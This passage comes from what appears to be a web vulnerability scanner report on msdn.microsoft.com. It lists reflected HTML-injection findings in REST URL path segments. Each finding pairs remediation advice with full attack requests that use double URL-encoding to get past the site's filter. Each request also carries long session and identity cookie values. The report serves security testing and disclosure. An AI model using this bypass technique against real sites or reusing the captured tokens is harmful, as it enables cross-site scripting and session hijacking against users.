Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library5de6e"><a>e545caa6f17/ff361664" />
...[SNIP]...

2.101. http://msdn.microsoft.com/en-us/library/ff361664.aspx [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ff361664.aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18998%2522%253e%253ca%253e4dd5a078452 was submitted in the REST URL parameter 3. This input was echoed as 18998"><a>4dd5a078452 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/ff361664.aspx18998%2522%253e%253ca%253e4dd5a078452 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9209
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:46 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ff361664.aspx18998"><a>4dd5a078452" />
...[SNIP]...

2.102. http://msdn.microsoft.com/en-us/library/ff921345.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ff921345.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3c821%2522%253e%253ca%253ede13ab68088 was submitted in the REST URL parameter 1. This input was echoed as 3c821"><a>de13ab68088 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us3c821%2522%253e%253ca%253ede13ab68088/library/ff921345.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9199
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:29 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us3c821"><a>de13ab68088/library/ff921345" />
...[SNIP]...

2.103. http://msdn.microsoft.com/en-us/library/ff921345.aspx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ff921345.aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c33c4%2522%253e%253ca%253eb63170bd290 was submitted in the REST URL parameter 2. This input was echoed as c33c4"><a>b63170bd290 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/libraryc33c4%2522%253e%253ca%253eb63170bd290/ff921345.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9200
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:44 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryc33c4"><a>b63170bd290/ff921345" />
...[SNIP]...

2.104. http://msdn.microsoft.com/en-us/library/ff921345.aspx [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ff921345.aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fc4f%2522%253e%253ca%253ea5cb942ec49 was submitted in the REST URL parameter 3. This input was echoed as 3fc4f"><a>a5cb942ec49 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/ff921345.aspx3fc4f%2522%253e%253ca%253ea5cb942ec49 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9209
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ff921345.aspx3fc4f"><a>a5cb942ec49" />
...[SNIP]...

2.105. http://msdn.microsoft.com/en-us/library/ms123401.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms123401.aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87f9c%2522%253e%253ca%253e4444cb60aed was submitted in the REST URL parameter 1. This input was echoed as 87f9c"><a>4444cb60aed in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us87f9c%2522%253e%253ca%253e4444cb60aed/library/ms123401.aspx HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; 